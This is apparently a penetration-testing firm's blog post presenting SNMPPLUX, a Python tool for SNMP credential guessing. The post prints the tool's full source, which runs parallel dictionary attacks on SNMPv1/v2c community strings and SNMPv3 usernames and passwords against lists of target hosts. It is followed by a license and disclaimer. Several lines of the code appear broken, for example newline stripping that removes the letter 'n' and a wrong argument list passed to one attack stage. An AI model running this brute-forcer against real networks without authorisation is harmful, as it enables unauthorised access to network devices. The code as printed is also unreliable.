SNMPPLUX

snmpplux

InteliSecure continually develops new tools and scripts to improve the effectiveness of the team. One such tool called SNMPPLUX is an offshoot of a larger development project (ORR).
SNMPPLUX is a USM compliant SNMPv1, SNMPv2c and SNMPv3 authentication scanner powered by pysnmp, re, sys, getopt, array, time and multiprocessing python modules.
As well as providing SNMPv1 and v2c community dictionary attacks is will also provide username and password dictionary attacks for SNMPv3 for the following authentication types:
• SNMPv3 Auth None
• SNMPv3 Auth MD5 Priv None
• SNMPv3 Auth MD5 Priv DES
• SNMPv3 Auth SHA Priv AES128
• SNMPv3 Auth SHA Priv AES192
• SNMPv3 Auth SHA Priv AES256
• SNMPv3 Auth SHA Priv DES
• SNMPv3 Auth SHA Priv 3DES

Whilst multiprocessing is currently used to speed up testing with parallel processes the future plans. A library version of this code is also utilised as part of the ORR project.

Screenshot from 2016-03-30 16_03_13

Screenshot showing example operation The current source code for this tool is included below on an as is basis. It may need to be reformatted to remove syntax and indenting errors introduced by providing the source in this format. Please see the License/Disclaimer below before using this software:

The source can also be downloaded from github:

https://github.com/PenturaLabs/SNMPPLUX

-----------------------snmpplux0.3.py source--------------------------------
from pysnmp.hlapi import *
import re
import sys, getopt
from array import *
import time
from multiprocessing import Pool

def banner():
        print ('.')
        print (' /   _____/           /     \______    ______       |   |    |      /  /')
        print (' _____    /   |     /   /  |     ___/|     ___/    |   |    |   /     / ')
        print (' /        /    |    /    Y        |    |    |   |    |___|    |  / /      ')
        print ('/_______  /____|__  /____|__  /____|    |____|   |_______ ______/ /___/   ')
        print ('        /         /         /                           /              _/')
        print (' ')
        print ('Liam Romanis')
        print ('version 0.3b - beta testing')
        print ('http://www.pentura.com')
        print ('.')


def opts(argv):
    inputfile = ''
    userfile = ''
    passfile = ''
    try:
        opts, args = getopt.getopt(argv, 'i:u:p:h', ['ifile=', 'ufile=','pfile=','help'])
    except getopt.GetoptError:
        print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
            sys.exit()
        elif opt in ('-i', '--ifile'):
            inputfile = arg
        elif opt in ('-u', '--ufile'):
            userfile = arg
        elif opt in ('-p', '--pfile'):
            passfile = arg

    return inputfile, userfile, passfile



def snmp1dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm, mpModel=0),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv1: %s: Community:%s" %(ip,comm))



def snmp2dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv2: %s: Community:%s" %(ip,comm))
         


def snmp3_authNone_privNone(ip, user):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
                pass
        elif errorStatus:
                pass
        else:
                print ("SNMPv3 Auth None Priv None: %s: %s - no pass requiredn" %(ip, user))



def snmp3_authMD5_privNone(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth MD5 Priv None: %s: %s:%s" % (ip, user, passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authMD5_privDES(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            sys.stdout.flush()
            print ("SNMPv3 Auth MD5 Priv DES: %s: %s:%s" % (ip,user,passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authSHA_privAES128(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb128Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES128: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb128Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb128Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES192(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb192Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES192: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb192Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb192Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES256(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb256Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES256: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb256Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb256Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privDES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmDESPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmDESPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmDESPrivProtocol' % (user,passwd))
        pass

def snmp3_authSHA_priv3DES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usm3DESEDEPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv 3DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usm3DESEDEPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usm3DESEDEPrivProtocol' % (user,passwd))
        pass

def snmp12_helper(args):
    return snmp1dict(*args), snmp2dict(*args)

def snmp3none_helper(args):
    return snmp3_authNone_privNone(*args)

def snmp3md5none_helper(args):
    return snmp3_authMD5_privNone(*args), snmp3_authMD5_privDES(*args)

def snmp3shaaes_helper(args):
    return snmp3_authSHA_privAES128(*args), snmp3_authSHA_privAES192(*args), snmp3_authSHA_privAES256(*args), snmp3_authSHA_privDES(*args), snmp3_authSHA_priv3DES(*args)



if __name__ == "__main__":
    banner()
    inputfile, userfile, passfile = opts(sys.argv[1:])

    with open(inputfile, "r") as ins:
            targs = []
            for line in ins:
                    line = line.replace("n", "")
                    targs.append(line)
            
    with open(userfile, "r") as ins:
            users= []
            for line in ins:
                    line = line.replace("n", "")
                    users.append(line)

    with open(passfile, "r") as ins:
        passwords = []
        for line in ins:
            if (len(line) > 8):
                line = line.replace("n", "")
                passwords.append(line)

    with open("dict.txt", "r") as ins:
        communities = []
        for line in ins:
            line = line.replace("n", "")
            communities.append(line)

    p = Pool(20)
    job1_args = [(ip, comm) for comm in communities for ip in targs]
    p.map(snmp12_helper, job1_args)
    job2_args = [(ip, user) for user in users for ip in targs]
    p.map(snmp3none_helper, job1_args)
    job3_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3md5none_helper, job3_args)
    job4_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3shaaes_helper, job4_args)

—————————————————————————–

LICENSE

Copyright ©2016 Pentura Ltd. This copyright applies to the Pentura codebase as a whole, or any individual distributed application. The individual contributions of government employees, which may be identified on a per-file basis are in the public domain. The software and content provided on this website are made available under the terms of the Apache License, Version 2.0. A copy of the License is available at:     http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

DISCLAIMER

THIS SOFTWARE AVAILABLE ON THE SITE http://www.pentura.com IS PROVIDED “AS IS” AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Pentura Ltd, OR ANY OF THEIR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Without limiting the foregoing, Pentura Ltd make no warranty that: •    the software will meet your requirements. •    the software will be uninterrupted, timely, secure or error-free. •    the results that may be obtained from the use of the software will be effective, accurate or reliable. •    the quality of the software will meet your expectations. •    any errors in the software obtained from the OpenSHA.org web site will be corrected. Software and its documentation made available on the http://www.pentura.com web site: •    could include technical or other mistakes, inaccuracies or typographical errors. Pentura contributors may make changes to the software or documentation made available on its web site. •    may be out of date and Pentura and its contributors make no commitment to update such materials. Pentura, and its contributors, assume no responsibility for errors or ommissions in the software or documentation available from the http://www.pentura.com web site. In no event shall Pentura, or it’s contributors be liable to you or any third parties for any special, punitive, incidental, indirect or consequential damages of any kind, or any damages whatsoever, including, without limitation, those resulting from loss of use, data or profits, whether or not Pentura and its contributors has been advised of the possibility of such damages, and on any theory of liability, arising out of or in connection with the use of this software. The use of the software downloaded through the http://www.pentura.com site is done at your own discretion and risk and with agreement that you will be solely responsible for any damage to your computer system or loss of data that results from such activities. No advice or information, whether oral or written, obtained by you from Pentura, its website or its contributors shall create any warranty for the software.